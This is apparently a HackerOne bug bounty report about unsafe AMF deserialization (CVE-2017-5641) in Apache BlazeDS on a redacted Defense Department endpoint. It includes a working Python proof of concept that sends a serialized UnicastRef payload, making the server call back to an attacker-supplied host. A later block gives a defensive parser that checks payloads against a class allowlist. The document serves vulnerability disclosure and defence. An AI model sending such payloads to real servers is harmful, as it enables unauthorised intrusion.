HackerOne report H1:728614 by sp1d3rs, Nov 04, 2019 - 4:12 a.m.

U.S. Dept Of Defense: [HTAF4-213] [Pre-submission] Unsafe AMF deserialization (CVE-2017-5641) in Apache Flex BlazeDS at the https://www.███████/daip/messagebroker/amf

2019-11-04 04:12:19
sp1d3rs
hackerone.com
$1666.65
4

7.5 High (CVSS2): AV:N/AC:L/Au:N/C:P/I:P/A:P
Attack Vector: NETWORK; Attack Complexity: LOW; Authentication: NONE; Confidentiality Impact: PARTIAL; Integrity Impact: PARTIAL; Availability Impact: PARTIAL

9.8 High (CVSS3): CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector: NETWORK; Attack Complexity: LOW; Privileges Required: NONE; User Interaction: NONE; Scope: UNCHANGED; Confidentiality Impact: HIGH; Integrity Impact: HIGH; Availability Impact: HIGH

7.1 High (AI Score), Confidence: High

## Description
We identified a potential unsafe deserialization vulnerability on the https://www.█████/daip/messagebroker/amf endpoint.

## POC
To rule out a false positive and show that the pingback is the result of AMF deserialization, and not a reaction to the external host appearing in the POST body, first send this request:

```http
POST /daip/messagebroker/amf HTTP/1.1
Host: www.███████
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.22.0
Content-Type: application/x-amf
Content-Length: 51

<your collaborator host>
```

Nothing will happen. You will receive something like this:
███
You can wait a few minutes to ensure that nothing comes in.

Next, send the collaborator host inside the serialized AMF payload using this script, e.g. `script.py <collaborator> 80`:

```python
import struct
import sys
import requests

if len(sys.argv) != 3:
    print("Usage: script.py <host> <port>")
    sys.exit(1)

callback_ip = sys.argv[1].encode()
callback_port = int(sys.argv[2])

# AMF0 envelope: version 3, 0 headers, 1 message with empty target/response URIs
# and an unknown (-1) body length; 0x11 switches the body to AMF3, 0x0a opens an object.
amf_payload = (
    b'\x00\x03\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\x11\x0a'
    # traits 0x07 = inline, externalizable object; 0x33 = inline class name of 25 bytes
    + b'\x07\x33' + b'sun.rmi.server.UnicastRef'
    # externalized UnicastRef fields: host (2-byte length + bytes) and port
    + struct.pack('>H', len(callback_ip)) + callback_ip
    + struct.pack('>I', callback_port)
    # remaining externalized fields (object id, UID, flag byte), unchanged from the report
    + b'\xf9\x6a\x76\x7b\x7c\xde\x68\x4f\x76\xd8\xaa\x3d\x00\x00\x01\x5b\xb0\x4c\x1d\x81\x80\x01\x00'
)

url = "https://www.███████/daip/messagebroker/amf"
headers = {'Content-Type': 'application/x-amf'}
response = requests.post(url, headers=headers, data=amf_payload, verify=False)
```

This will result in a significant delay, and soon you will get a pingback from the ███/███ IP.
This indicates that the backend server deserialized the AMF data and triggered a DNS lookup (there won't be an HTTP request, since sun.rmi.server.UnicastRef doesn't communicate via HTTP).
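As a defender-side check, added here and not part of the report, the following Python parses the AMF0 envelope of a captured `application/x-amf` request body and flags any AMF3 externalizable object whose class is not on an allowlist, which is the same idea patched BlazeDS versions apply server-side by restricting which classes AMF may instantiate. The parser assumes a header-less envelope as in the report, and the sample payload is constructed with a placeholder callback host and port.

```python
import struct

def u29(buf, pos):
    # AMF3 variable-length integer: up to three 7-bit bytes, then one full byte
    value = 0
    for i in range(4):
        b = buf[pos + i]
        if i == 3:
            return (value << 8) | b, pos + 4
        value = (value << 7) | (b & 0x7f)
        if not b & 0x80:
            return value, pos + i + 1

def amf0_utf(buf, pos):
    # AMF0 UTF-8 string: 2-byte big-endian length followed by the bytes
    (n,) = struct.unpack_from('>H', buf, pos)
    return buf[pos + 2:pos + 2 + n].decode('utf-8', 'replace'), pos + 2 + n

def externalizable_classes(raw):
    """Class names of externalizable AMF3 objects opening each message body of a header-less AMF0 envelope."""
    _version, header_count, message_count = struct.unpack_from('>HHH', raw, 0)
    if header_count:
        raise ValueError('AMF headers present; this parser expects none, as in the report')
    pos, found = 6, []
    for _ in range(message_count):
        _target, pos = amf0_utf(raw, pos)
        _response, pos = amf0_utf(raw, pos)
        (body_len,) = struct.unpack_from('>I', raw, pos)
        body = pos + 4
        if raw[body] == 0x11 and raw[body + 1] == 0x0a:  # AMF0 avmplus switch, AMF3 object marker
            traits, p = u29(raw, body + 2)
            if (traits & 0x07) == 0x07:  # inline object, inline traits, externalizable flag set
                ref, p = u29(raw, p)
                if ref & 1:  # inline class-name string; byte length sits in the upper bits
                    found.append(raw[p:p + (ref >> 1)].decode('utf-8', 'replace'))
        if body_len == 0xffffffff:  # unknown length: later messages cannot be located
            break
        pos = body + body_len
    return found

def unexpected_externalizable(raw, allowlist):
    # Classes the server would be asked to instantiate that are not explicitly permitted
    return [c for c in externalizable_classes(raw) if c not in allowlist]

# Constructed sample: the report's request shape with a placeholder callback host and port
HOST = b'collab.example'
SAMPLE = (b'\x00\x03\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\x11\x0a'
          b'\x07\x33sun.rmi.server.UnicastRef'
          + struct.pack('>H', len(HOST)) + HOST + struct.pack('>I', 80) + b'\x00' * 23)
```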

## Suggested fix
Update the Apache Flex BlazeDS library.

## Impact

Unsafe deserialization of AMF data.
We will work on this and try to improve the impact, if possible.
